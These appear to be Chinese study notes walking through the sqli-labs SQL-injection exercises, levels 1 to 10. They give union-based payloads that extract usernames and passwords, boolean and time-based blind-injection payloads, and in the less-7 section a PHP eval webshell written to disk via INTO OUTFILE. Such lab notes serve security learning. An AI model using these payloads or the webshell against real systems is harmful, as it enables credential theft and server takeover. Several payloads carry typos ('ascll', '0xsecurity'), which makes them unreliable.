less-1/2/3/4
- 查库:select schema_name from information_schema.schemata
- 查表:select table_name from information_schema.tables where table_schema=‘security’
- 查列:select column_name from information_schema.columns where table_name=‘users’
- 查字段:select username,password from security.users
- limit m,n 表示从第m行开始,之后出现n行数据。
- –+、-- (注意是减减空格)、# 是sql里面的注释符,他们后面的内容不再执行
- order by 后加一个数字表示第几列进行排序。用此函数判断该数据库由几列组成
- union select 1,2,3
每列之间用逗号隔开,而这里1,2,3的意思是第一列的内容为1,第二列的内容为2,以此类推。判断所需内容为第几列
- select——进行查看
- system_user()——系统用户
- user()——登录用户
- database()——所使用的数据库
- version()——版本信息
- @@datadir——安装路径
- @@versio_compile_os——当前的操作系统
- group_concat()——可以将所有的数据作为一行都显示出来
- concat_ws(’ ',A,B)单引号里可填任意东西
eg:若引号里为+,会显示出A+B
也可将单引号里的东西转化为十六进制,就可去掉单引号 - 步骤:
//先在源代码中找到$sql,在$sql的下一行输入如下两行
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
echo $sql;//把sql语句进行输出
echo "<br>"; //进行换行
①less1 id=1’;less2 id=1;less3 id=1’);less4 id=1")
②查看有多少列:order by 3–+
③查看哪些数据可以回显:union select 1,2,3–+
④查看当前数据库:union select 1,2,database()–+
⑤查看数据库security:union select 1,2,group_concat(schema_name)from information_schema.schemata–+
⑥查表:union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=‘security’–+
⑦查询列信息:union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=‘security’–+
⑧查询账号和密码:union select 1,2,group_concat(concat_ws(’~’,username,password)) from security.users–+
less-5/6
- left(a,b):从左侧截取a的前b位,正确返回1,错误返回0;eg-left(databade(),1)=‘a’,返回值为0
- regexp:eg-select user() regexp ‘root’ 若user()的结果是root,则单引号里为正确顺序的root的前几位都可,若匹配返回1,否则为0
- like:与regexp相同,只不过单引号里最后要加%
- substr(a,b,c):从位置b开始,截取长度为c的字符串a,正确返回1,错误返回0;eg-substr((select database()),1,1)=‘s’,若数据库名称为security,从第一位开始,截取长度为1的security,正确返回1
- ascll():将某个字符串转化为ascll值
- chr(数字);ord(‘字母’):使用Python中的两个函数判断当前的ascll码值
- 步骤:(布尔盲注)
①查看是否有注入:less-5:?id=1’;less-6:?id=1’’
②查看有多少列:order by 3–+
③通过二分法猜解得到所有的库:and ascll(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>100–+
④通过二分法猜解得到security下的所有表:and ascll(substr((select table_name from information_schema.tables where table_schema=0xsecurity limit 1,1),1,1))>1–+
⑤通过二分法猜解users内的字段:and ascll(substr((select column_name from information_schema.columns where table_name=0xsecurity limit 1,1),1,1))>1–+
⑥通过二分法猜解得到字段内的值:and ascll(substr((select username from security.users limit 1,1),1,1))>1–+
less-7
- 一句话木马:<?php @eval($_POST[" A "]);?> 其中A为密码
- load_file():读取本地文件;eg-select load_file(’ ')
- into outfile:写文件;
用法1-select ‘A’ into outfile ‘B’,将A写入B文件在;文件位置在C:\phpstudy\PHPTutorial\MySQL\data
用法2-select ‘A’ into outfile “直接写文件所在位置,注意要双斜杠以防被转义” - 步骤:
①查看是否有注入:?id=1’))
②查看有多少列:order by 3–+
③将一句话木马写入union select 1,2,’<?php @eval($_POST["crow"]);?> ’ into outfile"文件所在位置 "–+
④使用中国菜刀访问
less-8
- if(condition,A,B):如果条件成立返回A,否则返回B;
- sleep(num):表示延迟几秒
- 步骤:
法一布尔盲注
①查看是否有注入:less-8:?id=1’
②查看有多少列:order by 3–+
③通过二分法猜解得到所有的库:and ascll(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>100–+
④通过二分法猜解得到security下的所有表:and ascll(substr((select table_name from information_schema.tables where table_schema=0xsecurity limit 1,1),1,1))>1–+
⑤通过二分法猜解users内的字段:and ascll(substr((select column_name from information_schema.columns where table_name=0xsecurity limit 1,1),1,1))>1–+
⑥通过二分法猜解得到字段内的值:and ascll(substr((select username from security.users limit 1,1),1,1))>1–+
法二时间盲注
①使用延迟的方法判断是否存在注入漏洞:?di=1’ and sleep(5)–+
②判断数据库长度:id=1’ and if(length(database())=8,1,sleep(5))–+当为8时加载很快,其它值时加载很慢,说明数据库长度为8
③id=1’ and if(ascll(substr((select database()),1,1))>113,1,sleep(5))–+如果当前数据库的第一个字母的ascll值大于113,立即返回结果,否则执行5秒,然后判断112……
④其余步骤与法一相同
less-9/10
- 步骤:
①查看是否有注入:less-9:?id=1’;less-10:?id=1’’
②查看有多少列:order by 3–+;发现无论当值为多少时都回显you are in…,故不可使用order by
③使用延迟注入判断漏洞:and sleep(5)–+
④判断数据长度:and if(length(database())=猜测数据长度为n,1,sleep(5));通过返回时间进行判断,如果数据为n,则较快返回。
⑤之后步骤同less-8法二